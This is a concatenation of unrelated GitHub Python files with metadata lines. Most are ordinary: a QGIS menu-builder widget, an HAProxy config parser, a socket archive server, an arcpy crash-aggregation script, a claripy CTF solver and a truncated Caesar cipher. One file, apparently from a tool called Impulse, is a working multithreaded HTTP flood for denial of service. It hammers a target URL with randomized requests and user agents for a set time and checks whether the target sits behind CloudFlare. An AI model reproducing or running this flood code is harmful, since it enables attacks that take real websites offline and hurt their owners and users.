        profile = settings.value("MenuBuilder/profile", False)
        dock = settings.value("MenuBuilder/dock", False)
        menubar = settings.value("MenuBuilder/menubar", False)
        if not any([database, profile]):
            return
        self.set_connection(0, dbname=database)
        self.show_dock(bool(dock), profile=profile, schema=schema)
        if bool(dock):
            self.uiparent.iface.addDockWidget(Qt.LeftDockWidgetArea, self.dock_widget)
        self.show_menus(bool(menubar), profile=profile, schema=schema)
class CustomQtTreeView(QTreeView):
    """Tree view used as the drop target for the menu being edited.

    Accepts only QGIS layer-URI drags, supports deletion with the Delete
    key and can serialize its items (see :meth:`iteritems`).
    """
    def __init__(self, *args, **kwargs):
        super(CustomQtTreeView, self).__init__(*args, **kwargs)
    def dragMoveEvent(self, event):
        # accept everything while moving; filtering happens on enter
        event.acceptProposedAction()
    def dragEnterEvent(self, event):
        if not event.mimeData():
            # don't drag menu entry
            return False
        # refuse if it's not a qgis mimetype
        if event.mimeData().hasFormat(QGIS_MIMETYPE):
            event.acceptProposedAction()
    def keyPressEvent(self, event):
        # Delete removes the selected rows
        if event.key() == Qt.Key_Delete:
            self.dropItem()
    def dropItem(self):
        """Remove all selected rows, grouped per parent so row indexes stay
        valid while deleting (each removal shifts later rows by one)."""
        model = self.selectionModel().model()
        parents = defaultdict(list)
        for idx in self.selectedIndexes():
            parents[idx.parent()].append(idx)
        for parent, idx_list in parents.items():
            for diff, index in enumerate(idx_list):
                model.removeRow(index.row() - diff, parent)
    def iteritems(self, level=0):
        """
        Dump model to store in database.
        Generates each level recursively

        Yields ``(path, uri)`` pairs where path is a list of
        ``[row, text]`` components from root to leaf.
        """
        rowcount = self.model().rowCount()
        for itemidx in range(rowcount):
            # iterate over parents
            parent = self.model().itemFromIndex(self.model().index(itemidx, 0))
            for item, uri in self.traverse_tree(parent, []):
                yield item, uri
    def traverse_tree(self, parent, identifier):
        """
        Iterate over childs, recursively

        ``identifier`` accumulates the ``[row, text]`` path from the root;
        leaves yield a copy of it plus their own component and their data.
        """
        identifier.append([parent.row(), parent.text()])
        for row in range(parent.rowCount()):
            child = parent.child(row)
            if child.hasChildren():
                # child is a menu ?
                for item in self.traverse_tree(child, identifier):
                    yield item
                identifier.pop()
            else:
                # add leaf
                sibling = list(identifier)
                sibling.append([child.row(), child.text()])
                yield sibling, child.data()
class DockQtTreeView(CustomQtTreeView):
    """Read-only variant of CustomQtTreeView used in the dock widget."""
    def __init__(self, *args, **kwargs):
        super(DockQtTreeView, self).__init__(*args, **kwargs)
    def keyPressEvent(self, event):
        """override keyevent to avoid deletion of items in the dock"""
        pass
class MenuTreeModel(QStandardItemModel):
    """Item model holding the menu tree; (de)serializes items as QGIS
    layer-URI mime data so layers can be dragged in and out."""
    def __init__(self, *args, **kwargs):
        super(MenuTreeModel, self).__init__(*args, **kwargs)
    def dropMimeData(self, mimedata, action, row, column, parentIndex):
        """
        Handles the dropping of an item onto the model.
        De-serializes the data and inserts it into the model.
        """
        # decode data using qgis helpers
        uri_list = QgsMimeDataUtils.decodeUriList(mimedata)
        if not uri_list:
            return False
        # find parent item
        dropParent = self.itemFromIndex(parentIndex)
        if not dropParent:
            return False
        # each uri will become a new item
        for uri in uri_list:
            item = QStandardItem(uri.name)
            item.setData(uri)
            # avoid placing dragged layers on it
            item.setDropEnabled(False)
            if uri.providerKey in ICON_MAPPER:
                item.setIcon(QIcon(ICON_MAPPER[uri.providerKey]))
            dropParent.appendRow(item)
        dropParent.emitDataChanged()
        return True
    def mimeData(self, indexes):
        """
        Used to serialize data

        Returns None unless every selected item carries a layer URI.
        """
        if not indexes:
            return
        items = [self.itemFromIndex(idx) for idx in indexes]
        if not items:
            return
        if not all(it.data() for it in items):
            return
        # reencode items
        mimedata = QgsMimeDataUtils.encodeUriList([item.data() for item in items])
        return mimedata
    def mimeTypes(self):
        # only the QGIS layer-URI mime type is handled
        return [QGIS_MIMETYPE]
    def supportedDropActions(self):
        return Qt.CopyAction | Qt.MoveAction
class LeafFilterProxyModel(QSortFilterProxyModel):
    """
    Class to override the following behaviour:
        If a parent item doesn't match the filter,
        none of its children will be shown.

    This Model matches items which are descendants
    or ascendants of matching items.
    """
    def filterAcceptsRow(self, row_num, source_parent):
        """Overriding the parent function

        A row is kept when it matches itself, when any ancestor matches,
        or when any descendant matches.
        """
        # Check if the current row matches
        if self.filter_accepts_row_itself(row_num, source_parent):
            return True
        # Traverse up all the way to root and check if any of them match
        if self.filter_accepts_any_parent(source_parent):
            return True
        # Finally, check if any of the children match
        return self.has_accepted_children(row_num, source_parent)
    def filter_accepts_row_itself(self, row_num, parent):
        # delegate to the stock QSortFilterProxyModel matching
        return super(LeafFilterProxyModel, self).filterAcceptsRow(row_num, parent)
    def filter_accepts_any_parent(self, parent):
        """
        Traverse to the root node and check if any of the
        ancestors match the filter
        """
        while parent.isValid():
            if self.filter_accepts_row_itself(parent.row(), parent.parent()):
                return True
            parent = parent.parent()
        return False
    def has_accepted_children(self, row_num, parent):
        """
        Starting from the current node as root, traverse all
        the descendants and test if any of the children match
        """
        model = self.sourceModel()
        source_index = model.index(row_num, 0, parent)
        children_count = model.rowCount(source_index)
        for i in range(children_count):
            if self.filterAcceptsRow(i, source_index):
                return True
        return False
| Oslandia/qgis-menu-builder | menu_builder_dialog.py | menu_builder_dialog.py | py | 32,979 | python | en | code | 2 | github-code | 36 |
26523812537 | #!/usr/bin/env python
# -*- coding: utf8 -*-
import os
import pyhaproxy.pegnode as pegnode
import pyhaproxy.config as config
class Parser(object):
"""Do parsing the peg-tree and build the objects in config module
Attributes:
filepath (str): the absolute path of haproxy config file
filestring (str): the content of haproxy config file
"""
def __init__(self, filepath='/etc/haproxy/haproxy.cfg', filestring=None):
if filestring:
self.filestring = filestring
elif filepath:
self.filestring = self.__read_string_from_file(filepath)
else:
raise Exception('please validate your input')
def build_configuration(self):
"""Parse the haproxy config file
Raises:
Exception: when there are unsupported section
Returns:
config.Configuration: haproxy config object
"""
configuration = config.Configuration()
pegtree = pegnode.parse(self.filestring)
for section_node in pegtree:
if isinstance(section_node, pegnode.GlobalSection):
configuration.globall = self.build_global(section_node)
elif isinstance(section_node, pegnode.FrontendSection):
configuration.frontends.append(
self.build_frontend(section_node))
elif isinstance(section_node, pegnode.DefaultsSection):
configuration.defaults.append(
self.build_defaults(section_node))
elif isinstance(section_node, pegnode.ListenSection):
configuration.listens.append(
self.build_listen(section_node))
elif isinstance(section_node, pegnode.UserlistSection):
configuration.userlists.append(
self.build_userlist(section_node))
elif isinstance(section_node, pegnode.BackendSection):
configuration.backends.append(
self.build_backend(section_node))
return configuration
def build_global(self, global_node):
"""parse `global` section, and return the config.Global
Args:
global_node (TreeNode): `global` section treenode
Returns:
config.Global: an object
"""
config_block_lines = self.__build_config_block(
global_node.config_block)
return config.Global(config_block=config_block_lines)
def __build_config_block(self, config_block_node):
"""parse `config_block` in each section
Args:
config_block_node (TreeNode): Description
Returns:
[line_node1, line_node2, ...]
"""
node_lists = []
for line_node in config_block_node:
if isinstance(line_node, pegnode.ConfigLine):
node_lists.append(self.__build_config(line_node))
elif isinstance(line_node, pegnode.OptionLine):
node_lists.append(self.__build_option(line_node))
elif isinstance(line_node, pegnode.ServerLine):
node_lists.append(
self.__build_server(line_node))
elif isinstance(line_node, pegnode.BindLine):
node_lists.append(
self.__build_bind(line_node))
elif isinstance(line_node, pegnode.AclLine):
node_lists.append(
self.__build_acl(line_node))
elif isinstance(line_node, pegnode.BackendLine):
node_lists.append(
self.__build_usebackend(line_node))
elif isinstance(line_node, pegnode.UserLine):
node_lists.append(
self.__build_user(line_node))
elif isinstance(line_node, pegnode.GroupLine):
node_lists.append(
self.__build_group(line_node))
else:
# may blank_line, comment_line
pass
return node_lists
def build_defaults(self, defaults_node):
"""parse `defaults` sections, and return a config.Defaults
Args:
defaults_node (TreeNode): Description
Returns:
config.Defaults: an object
"""
proxy_name = defaults_node.defaults_header.proxy_name.text
config_block_lines = self.__build_config_block(
defaults_node.config_block)
return config.Defaults(
name=proxy_name,
config_block=config_block_lines)
def build_userlist(self, userlist_node):
"""parse `userlist` sections, and return a config.Userlist"""
proxy_name = userlist_node.userlist_header.proxy_name.text
config_block_lines = self.__build_config_block(
userlist_node.config_block)
return config.Userlist(
name=proxy_name,
config_block=config_block_lines)
def build_listen(self, listen_node):
"""parse `listen` sections, and return a config.Listen
Args:
listen_node (TreeNode): Description
Returns:
config.Listen: an object
"""
proxy_name = listen_node.listen_header.proxy_name.text
service_address_node = listen_node.listen_header.service_address
# parse the config block
config_block_lines = self.__build_config_block(
listen_node.config_block)
# parse host and port
host, port = '', ''
if isinstance(service_address_node, pegnode.ServiceAddress):
host = service_address_node.host.text
port = service_address_node.port.text
else:
# use `bind` in config lines to fill in host and port
# just use the first
for line in config_block_lines:
if isinstance(line, config.Bind):
host, port = line.host, line.port
break
else:
raise Exception(
'Not specify host and port in `listen` definition')
return config.Listen(
name=proxy_name, host=host, port=port,
config_block=config_block_lines)
def build_frontend(self, frontend_node):
"""parse `frontend` sections, and return a config.Frontend
Args:
frontend_node (TreeNode): Description
Raises:
Exception: Description
Returns:
config.Frontend: an object
"""
proxy_name = frontend_node.frontend_header.proxy_name.text
service_address_node = frontend_node.frontend_header.service_address
# parse the config block
config_block_lines = self.__build_config_block(
frontend_node.config_block)
# parse host and port
host, port = '', ''
if isinstance(service_address_node, pegnode.ServiceAddress):
host = service_address_node.host.text
port = service_address_node.port.text
else:
# use `bind` in config lines to fill in host and port
# just use the first
for line in config_block_lines:
if isinstance(line, config.Bind):
host, port = line.host, line.port
break
else:
raise Exception(
'Not specify host and port in `frontend` definition')
return config.Frontend(
name=proxy_name, host=host, port=port,
config_block=config_block_lines)
def build_backend(self, backend_node):
"""parse `backend` sections
Args:
backend_node (TreeNode): Description
Returns:
config.Backend: an object
"""
proxy_name = backend_node.backend_header.proxy_name.text
config_block_lines = self.__build_config_block(
backend_node.config_block)
return config.Backend(name=proxy_name, config_block=config_block_lines)
def __build_server(self, server_node):
server_name = server_node.server_name.text
host = server_node.service_address.host.text
port = server_node.service_address.port.text
# parse server attributes, value is similar to \
# 'maxconn 1024 weight 3 check inter 2000 rise 2 fall 3'
server_attributes = server_node.value.text.split(' \t')
return config.Server(
name=server_name, host=host, port=port,
attributes=server_attributes)
def __build_config(self, config_node):
return config.Config(keyword=config_node.keyword.text,
value=config_node.value.text)
def __build_option(self, option_node):
return config.Option(keyword=option_node.keyword.text,
value=option_node.value.text)
def __build_bind(self, bind_node):
service_address = bind_node.service_address
return config.Bind(
host=service_address.host.text,
port=service_address.port.text,
attributes=bind_node.value.text.split(' \t'))
def __build_acl(self, acl_node):
acl_name = acl_node.acl_name.text
acl_value = acl_node.value.text
return config.Acl(name=acl_name, value=acl_value)
def __build_usebackend(self, usebackend_node):
operator = usebackend_node.operator.text
backendtype = usebackend_node.backendtype.text
return config.UseBackend(
backend_name=usebackend_node.backend_name.text,
operator=operator,
backend_condition=usebackend_node.backend_condition.text,
is_default=(backendtype == 'default_backend'))
def __build_user(self, user_node):
groups_fragment = user_node.groups_fragment.text
group_names = groups_fragment.split(',') if groups_fragment else []
return config.User(
name=user_node.user_name.text,
passwd=user_node.password.text,
passwd_type=user_node.passwd_type.text,
group_names=group_names)
def __build_group(self, group_node):
users_fragment = group_node.users_fragment.text
user_names = users_fragment.split(',') if users_fragment else []
return config.Group(
name=group_node.group_name.text,
user_names=user_names)
def __read_string_from_file(self, filepath):
filestring = ''
if os.path.exists(filepath):
with open(filepath) as f:
filestring = f.read()
return filestring
| imjoey/pyhaproxy | pyhaproxy/parse.py | parse.py | py | 10,541 | python | en | code | 53 | github-code | 36 |
5820967293 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 6 18:28:13 2022
@author: ldd775
"""
import socket, sys, re, os
import params
def recBytes():
    """Single-connection server: receive a client's archive stream.

    Accepts one TCP connection and appends everything received to
    ArchivedFileByServer.txt until a zero-length read signals EOF.
    NOTE(review): assumes the project's `params` module is importable
    (../lib is appended to sys.path here).
    """
    sys.path.append("../lib")  # for params
    switchesVarDefaults = (
        (('-l', '--listenPort') ,'listenPort', 50001),
        (('-?', '--usage'), "usage", False),  # boolean (set if present)
    )
    progname = "echoserver"
    paramMap = params.parseParams(switchesVarDefaults)
    listenPort = paramMap['listenPort']
    listenAddr = ''  # Symbolic name meaning all available interfaces
    if paramMap['usage']:
        params.usage()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((listenAddr, listenPort))
    s.listen(1)  # allow only one outstanding request
    # s is a factory for connected sockets
    conn, addr = s.accept()  # wait until incoming connection request (and accept it)
    print('Connected by', addr)
    archive = os.open("ArchivedFileByServer.txt", os.O_CREAT | os.O_RDWR)
    while 1:
        # 100-byte reads; an empty read means the client closed the socket.
        data = conn.recv(100)
        print("RECEIVING:")
        print(data)
        os.write(archive, data)
        if len(data) == 0:
            print("Zero length read, finished getting archive")
            break
def recBytes2():
    """Forking server: accept connections and store each client's archive.

    Each accepted connection is handled in a forked child, which writes
    the received bytes to ArchivedFileByServer.txt, unarchives them via
    unarchiver2(), and exits; the parent reaps the child and loops.
    """
    sys.path.append("../lib")  # for params
    switchesVarDefaults = (
        (('-l', '--listenPort') ,'listenPort', 50001),
        (('-?', '--usage'), "usage", False),  # boolean (set if present)
    )
    progname = "echoserver"
    paramMap = params.parseParams(switchesVarDefaults)
    listenPort = paramMap['listenPort']
    listenAddr = ''  # Symbolic name meaning all available interfaces
    if paramMap['usage']:
        params.usage()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((listenAddr, listenPort))
    s.listen(1)  # allow only one outstanding request
    # s is a factory for connected sockets
    while 1:
        conn, addr = s.accept()  # wait until incoming connection request (and accept it)
        rc = os.fork()
        if rc < 0:
            print("fork failed")
        elif rc == 0:
            # Child: receive the archive until a zero-length read (EOF).
            print("child will execute")
            print('Connected by', addr)
            archive = os.open("ArchivedFileByServer.txt", os.O_CREAT | os.O_RDWR)
            while 1:
                data = conn.recv(100)
                print("RECEIVING:")
                print(data)
                os.write(archive, data)
                if len(data) == 0:
                    print("Zero length read, finished getting archive")
                    break
            unarchiver2()
            sys.exit(1)
        else:
            # Parent: reap the finished child, then accept the next client.
            os.wait()
            continue
def unarchiver():
    """Unpack ArchivedFileByServer.txt into a new UnArchivedFile directory.

    Archive layout: repeated records consisting of a 4-byte header
    (byte 1 = filename length, byte 3 = content length) followed by the
    filename and then the file content.
    Note: this chdir()s into UnArchivedFile and does not restore the cwd,
    matching the original behavior.

    Fixes over the original: the loop condition `type(header) != None`
    was always true (the loop only ever exited via break), the first
    record was handled by duplicated pre-loop code, and an empty archive
    raised IndexError.
    """
    archive = os.open("ArchivedFileByServer.txt", os.O_RDONLY)
    os.mkdir("UnArchivedFile")
    os.chdir("UnArchivedFile")
    while True:
        header = os.read(archive, 4)
        if len(header) < 4:  # end of archive (os.read returns b'' at EOF)
            break
        file_title = os.read(archive, header[1]).decode()
        out_fd = os.open(file_title, os.O_CREAT | os.O_RDWR)
        os.write(out_fd, os.read(archive, header[3]))
        os.close(out_fd)
    os.close(archive)
def unarchiver2():
    """Interactively unpack the server's archive file.

    Reads 4-byte record headers (byte 1 = filename length, byte 3 =
    content length); a follow-up header whose filename length is 0 marks
    a continuation chunk belonging to the current file.
    NOTE(review): the archive path is hard-coded to one user's home
    directory, and this chdir()s into the new directory permanently.
    """
    archive = os.open("/home/ldd775/os-project3-framing-lddavila/lib/ArchivedFileByServer.txt", os.O_RDONLY)
    directoryUserWantsToMake = input("Please enter the name of the file you want to unarchive into.")
    os.mkdir(directoryUserWantsToMake)
    os.chdir(directoryUserWantsToMake)
    header = os.read(archive, 4)
    header = bytes(header)
    while(type(header) != None):  # NOTE(review): always true; loop only exits via break
        # print("Value of the header",header)
        # print("Value of header[3]", header[3])
        # print("Class of header[3]",type(header[3]))
        if len(header) == 0:
            break
        fileBeingRestoredTitle = (os.read(archive, header[1])).decode()
        fileBeingRestored = os.open(fileBeingRestoredTitle, os.O_CREAT | os.O_RDWR)
        # print("Class of fileBeingRestored", type(fileBeingRestored))
        # print("Class of archive", type(archive))
        os.write(fileBeingRestored, os.read(archive, header[3]))
        try:
            header = os.read(archive, 4)
            header = bytes(header)
        except:
            header = None
            continue
        print("Value of header", header)
        print("length of header", len(header))
        if len(header) == 0:
            break
        while (header[1] == 0):
            # Zero-length filename: this chunk continues the current file.
            os.write(fileBeingRestored, os.read(archive, header[3]))
            header = os.read(archive, 4)
            header = bytes(header)
        os.close(fileBeingRestored)
if __name__ == "__main__":
    # Entry point: run the forking server variant.
    recBytes2()
#unarchiver2() | utep-cs-systems-courses/os-project3-framing-lddavila | lib/framingServer.py | framingServer.py | py | 5,153 | python | en | code | 0 | github-code | 36 |
43660570358 | import arcpy
import os
import csv
def aggregate_by_route_by_injury_type(route_fc, crash_fc, gdb, distance):
"""Iterates through the bus route data and aggregates the number and type of injuries within the search distance"""
arcpy.env.workspace = gdb
route_dictionary = {}
for row in arcpy.da.SearchCursor(route_fc, ["ROUTE_TOM", "AGENCY"]):
route = row[0]
agency = row[1]
if (route, agency) not in route_dictionary:
route_dictionary[(route, agency)] = {}
current_layer = os.path.join(gdb, "current")
sql_query = "\"ROUTE_TOM\" = '" + str(route) + "' AND \"AGENCY\" = '" + agency + "'"
arcpy.MakeFeatureLayer_management(route_fc, current_layer, sql_query)
arcpy.MakeFeatureLayer_management(crash_fc, "crashes")
arcpy.SelectLayerByLocation_management("crashes", "WITHIN_A_DISTANCE", current_layer, distance, "NEW_SELECTION")
selected_crashes = os.path.join(gdb, "selected")
arcpy.CopyFeatures_management("crashes", selected_crashes)
for row2 in arcpy.da.SearchCursor(selected_crashes, ["INJY_STAT_DESCR"]):
if row2[0] not in route_dictionary[(route, agency)]:
route_dictionary[(route, agency)][row2[0]] = 1
else:
route_dictionary[(route, agency)][row2[0]] += 1
arcpy.Delete_management(current_layer)
arcpy.Delete_management("crashes")
arcpy.Delete_management(selected_crashes)
return route_dictionary
def write_results_to_text_file(route_dictionary, output_path):
    """Writes the results of the aggregated crash data to a tab-delimited file"""
    # NOTE(review): opening in "wb" for csv.writer is Python 2 style; under
    # Python 3 this must be open(output_path, "w", newline="") instead --
    # confirm which interpreter the ArcGIS install provides.
    with open(output_path, "wb") as text_file:
        writer = csv.writer(text_file, delimiter="\t")
        legend = ["Bus Route", "Agency", "Injury Type", "Count"]
        writer.writerow(legend)
        # One row per (route, agency, injury type) combination.
        for (route, agency) in route_dictionary:
            for injury in route_dictionary[(route, agency)]:
                row = [route, agency, injury, route_dictionary[(route, agency)][injury]]
                writer.writerow(row)
    del text_file
def write_results_to_gis_feature_class(route_dictionary, gis_fc):
    """Adds the aggregated injury data to a feature class"""
    injury_type_list = ["Fatal injury", "Non-fatal injury - Incapacitating", "Non-fatal injury - Non-incapacitating",
                        "Non - fatal injury - Possible"]
    # One SHORT field per injury type plus a LONG field for the EPDO score.
    # NOTE(review): AddField is called with the raw names (spaces/dashes);
    # presumably arcpy sanitizes them to match the replace() transform used
    # for `fields` below -- confirm against the geodatabase schema.
    for i in injury_type_list:
        arcpy.AddField_management(gis_fc, i, "SHORT")
    arcpy.AddField_management(gis_fc, "EPDO", "LONG")
    fields = ["ROUTE_TOM", "AGENCY", "EPDO"] + [i.replace(" ", "_").replace("-", "_") for i in injury_type_list]
    with arcpy.da.UpdateCursor(gis_fc, fields) as cursor:
        for row in cursor:
            key = (row[0], row[1])
            if key in route_dictionary:
                total = 0
                for inj in injury_type_list:
                    if inj in route_dictionary[key]:
                        # EPDO weighting: 10 per fatal crash, 5 otherwise.
                        total += (route_dictionary[key][inj] * 10 if inj == "Fatal injury" else route_dictionary[key][inj] * 5)
                        injury = inj.replace(" ", "_").replace("-", "_")
                        row[fields.index(injury)] = route_dictionary[key][inj]
                row[2] = total
                cursor.updateRow(row)
    del cursor
    return
# Hard-coded workstation paths for the input route/crash feature classes,
# the scratch geodatabase, and the tab-delimited report.
buses_fc = r"U:\Projects\Tasks_For_Bonnie\Bicyclist_Bus_Routes_092116\bicyclist_bus_routes_092116.gdb\MBTA_Bus_Routes"
crashes_fc = r"U:\Projects\Tasks_For_Bonnie\Bicyclist_Bus_Routes_092116\bicyclist_bus_routes_092116.gdb\bicyclist_crashes_with_mbta_120516"
geodatabase = r"U:\Projects\Tasks_For_Bonnie\Bicyclist_Bus_Routes_092116\output.gdb"
out_file = os.path.join(r"U:\Projects\Tasks_For_Bonnie\Bicyclist_Bus_Routes_092116", "Bicyclist Route Crashes MBTA - 120716.txt")
# Aggregate crashes within 50 feet of each route, then write both reports.
route_dict = aggregate_by_route_by_injury_type(buses_fc, crashes_fc, geodatabase, "50 Feet")
write_results_to_text_file(route_dict, out_file)
write_results_to_gis_feature_class(route_dict, buses_fc)
| ttlin1/Bus | determine_number_crashes_for_each_route.py | determine_number_crashes_for_each_route.py | py | 4,071 | python | en | code | 0 | github-code | 36 |
43696108113 | import os
from math import ceil
from keras import backend
from keras import optimizers
from keras.applications.vgg19 import VGG19
from keras.applications.resnet50 import ResNet50
from keras.layers import Dense, Flatten, BatchNormalization, Dropout
from keras.models import Sequential, Model
from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau
# from keras.utils import plot_model
from tensor_board import MyTensorBoard
from parallel_model import ParallelModel
class ImageClassifier:
    """Multi-label image classifier built on a pretrained VGG19 backbone.

    The backbone's convolutional features are flattened and fed to a
    sigmoid Dense layer with `output_size` units (one per label).
    Weights and TensorBoard logs are stored per cross-validation split
    under `root_path`.
    """
    root_path = ""
    input_shape = ()
    output_size = 0
    model = None

    def __init__(self, root_path, input_shape, output_size):
        """Build the VGG19 + Flatten + Dense(sigmoid) model."""
        self.root_path = root_path
        self.input_shape = input_shape
        self.output_size = output_size
        self.base_model = VGG19(weights='imagenet', include_top=False, input_shape=self.input_shape)
        self.model = Sequential()
        self.model.add(self.base_model)
        self.model.add(Flatten())
        self.model.add(Dense(self.output_size, activation='sigmoid'))
        # Alternative ResNet50 head kept for reference:
        # self.base_model = ResNet50(include_top=False, input_shape=self.input_shape, pooling='avg', weights='imagenet')
        # x = self.base_model.output
        # x = Dense(2048, activation='relu')(x)
        # x = Dropout(0.25)(x)
        # output = Dense(self.output_size, activation='sigmoid')(x)
        # self.model = Model(inputs=self.base_model.inputs, outputs=output)
        # self.model = ParallelModel(self.model, gpus=4)
        # plot_model(self.model, to_file=os.path.join(root_path, 'model.png'))

    @staticmethod
    def f2(y_true, y_pred):
        """F-beta metric with beta^2 = 4 (F2): recall weighted over precision."""
        def recall(y_true, y_pred):
            true_positives = backend.sum(backend.round(backend.clip(y_true * y_pred, 0, 1)))
            possible_positives = backend.sum(backend.round(backend.clip(y_true, 0, 1)))
            recall = true_positives / (possible_positives + backend.epsilon())
            return recall

        def precision(y_true, y_pred):
            true_positives = backend.sum(backend.round(backend.clip(y_true * y_pred, 0, 1)))
            predicted_positives = backend.sum(backend.round(backend.clip(y_pred, 0, 1)))
            precision = true_positives / (predicted_positives + backend.epsilon())
            return precision

        precision = precision(y_true, y_pred)
        recall = recall(y_true, y_pred)
        beta_squared = 4
        # Standard F-beta formula: (1 + b^2) * P * R / (b^2 * P + R)
        return (beta_squared + 1) * ((precision * recall) / (beta_squared * precision + recall + backend.epsilon()))

    def train(self, x, y, batch_size, validation_data, lr, epochs, idx_split=0):
        """Train on in-memory arrays with early stopping, LR reduction, and checkpointing."""
        self.model.compile(loss='binary_crossentropy',
                           optimizer=optimizers.Adam(lr=lr),
                           metrics=['accuracy', self.f2])
        early_stop = EarlyStopping(patience=2)
        model_checkpoint = ModelCheckpoint(self.__get_weights_path(idx_split), save_best_only=True)
        reduce_lr = ReduceLROnPlateau(patience=2, cooldown=2)
        tensor_board = MyTensorBoard(log_dir=self.__get_logs_path(idx_split, lr, epochs), write_images=True)
        self.model.fit(x=x,
                       y=y,
                       validation_data=validation_data,
                       batch_size=batch_size,
                       epochs=epochs,
                       callbacks=[early_stop, reduce_lr, model_checkpoint, tensor_board])

    def train_generator(self, train_gen, train_size, valid_gen, valid_size, batch_size, lr, decay, epochs, idx_split=0):
        """Train from data generators; step counts are derived from the set sizes."""
        self.model.compile(loss='binary_crossentropy',
                           optimizer=optimizers.Adam(lr=lr, decay=decay),
                           metrics=['accuracy', self.f2])
        early_stop = EarlyStopping(patience=4, min_delta=1e-4)
        model_checkpoint = ModelCheckpoint(self.__get_weights_path(idx_split), save_best_only=True)
        tensor_board = MyTensorBoard(log_dir=self.__get_logs_path(idx_split, lr, epochs), write_images=True)
        self.model.fit_generator(generator=train_gen,
                                 steps_per_epoch=(train_size // batch_size + 1),
                                 epochs=epochs,
                                 shuffle=False,
                                 validation_data=valid_gen,
                                 validation_steps=(valid_size // batch_size + 1),
                                 callbacks=[early_stop, model_checkpoint, tensor_board])

    def predict(self, x, batch_size):
        """Predict label probabilities for in-memory inputs."""
        return self.model.predict(x=x, batch_size=batch_size)

    def predict_generator(self, test_gen, test_size, batch_size):
        """Predict label probabilities from a data generator."""
        return self.model.predict_generator(generator=test_gen, steps=(test_size // batch_size + 1))

    def save(self, idx_split=0):
        """Save the model weights for the given split."""
        self.model.save_weights(self.__get_weights_path(idx_split))

    def load(self, idx_split=0):
        """Load the model weights for the given split."""
        self.model.load_weights(self.__get_weights_path(idx_split))

    def load_if_exist(self, idx_split):
        """Load the split's weights only when the weights file exists."""
        weights_path = self.__get_weights_path(idx_split)
        if os.path.isfile(weights_path):
            self.model.load_weights(weights_path)

    def set_trainable(self, trainable):
        """Freeze or unfreeze every layer of the backbone."""
        for layer in self.base_model.layers:
            layer.trainable = trainable

    def __get_weights_path(self, idx_split):
        # Weights live under <root>/models/, one file per split.
        return os.path.join(self.root_path, 'models', 'split{}.h5'.format(idx_split))

    def __get_logs_path(self, idx_split, lr, epochs):
        # TensorBoard logs are keyed by split, learning rate, and epochs.
        return os.path.join(self.root_path, 'logs', 'split{}-lr{}-epochs{}'.format(idx_split, lr, epochs))
| anson627/kaggle | planet/lib/classifier.py | classifier.py | py | 5,485 | python | en | code | 0 | github-code | 36 |
25634514682 | import claripy
import code
from hashlib import sha512
import json
import sys
# Model every circuit wire as a 1-bit symbolic variable and constrain the
# top slice of gates so the final output bit (b[33895]) is forced to 0.
b = [claripy.BVS('b_%d' % i, 1) for i in range(33896)]
s = claripy.Solver()
with open("map3.txt", 'r') as f:
    cipher, chalbox = json.loads(f.read())
length, gates, check = chalbox
# Only gates 33767..33895 are constrained; gate i is stored at gates[i - 128].
for i in range(33767, 33896):
    name, args = gates[i-128]
    if name == 'false':
        s.add(b[i] == claripy.BVV(0, 1))
    else:
        # Each gate argument is (source wire index, negate flag).
        if args[0][1] == True:
            arg1 = 1
        else:
            arg1 = 0
        if args[1][1] == True:
            arg2 = 1
        else:
            arg2 = 0
        u1 = b[args[0][0]] ^ arg1
        u2 = b[args[1][0]] ^ arg2
        # NOTE(review): 'or' is modelled as just the first input and 'xor'
        # as just the second -- presumably a deliberate simplification for
        # this challenge; confirm against the original gate semantics.
        if name == 'or':
            s.add(b[i] == u1)
        elif name == 'xor':
            s.add(b[i] == u2)
s.add(b[33895] == 0)
# Concretize every wire the solver has pinned to a single value, then drop
# into an interactive shell to inspect the result.
for i in range(0, 33896):
    if len(s.eval(b[i], 2)) == 1:
        b[i] = s.eval(b[i], 1)[0]
code.interact(local=locals())
| posgnu/ctfs | pctf2018/3iscABC/sol.py | sol.py | py | 907 | python | en | code | 1 | github-code | 36 |
990448118 | import requests
import random
import time
from threading import Thread
# Import modules for HTTP flood
import tools.randomData as randomData
import tools.ipTools as ipTools
def HTTP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
if ipTools.isCloudFlare(target):
if not input("[?] Current site is under CloudFlare protection. Do you want to continue? (y/n)\n >>> ") in ("y", "Y", "1"):
exit()
print("[#] Attack started for " + str(attack_time) + " secounds..")
threads_list = []
# Load 25 random user agents
user_agents = []
for _ in range(threads):
user_agents.append( randomData.random_useragent() )
# HTTP flood
def http_flood():
global FINISH
while True:
if FINISH:
break
payload = str(random._urandom(random.randint(1, 30)))
headers = {
"X-Requested-With": "XMLHttpRequest",
"Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"Accept-Encoding": "gzip, deflate, br",
"User-agent": random.choice(user_agents)
}
try:
r = requests.get(target, params = payload)
except Exception as e:
print(e)
time.sleep(2)
else:
print("[" + str(r.status_code) + "] Request sent! Payload size: " + str(len(payload)))
# Start threads
for thread in range(0, threads):
print("[#] Staring thread " + str(thread))
t = Thread(target = http_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("[!] HTTP attack stopped!") | Marshmello1912/Git | Impulse/tools/L7/http.py | http.py | py | 1,653 | python | en | code | 0 | github-code | 36 |
38552357203 | '''
# the Space Complexity is O(1) and the Time Complexity is O(N)
def caesar_enc(str, key):
alpha = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', ' j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u',
'v', 'w', 'x', 'y', 'z' ] # or say alpha=list("abcdefjhijklmnopqrstuwuxyz")
HashTable = {}
string = []
for i in range(key, key - 26, -1):
HashTable[alpha[i - key]] = alpha[i]
for char in str:
string.append(HashTable[char])
return "".join(string)
string="abcdab"
print(caesar_enc(string, 2))
'''
# the Space Complexity is O(1) and the Time Complexity is O(N) (more practical than above)
def caesar_enc(text, key):
    """Encrypt lowercase `text` with a Caesar shift of `key` places.

    Letters that run past 'z' wrap back to the start of the alphabet.
    (The parameter was previously named `str`, shadowing the builtin;
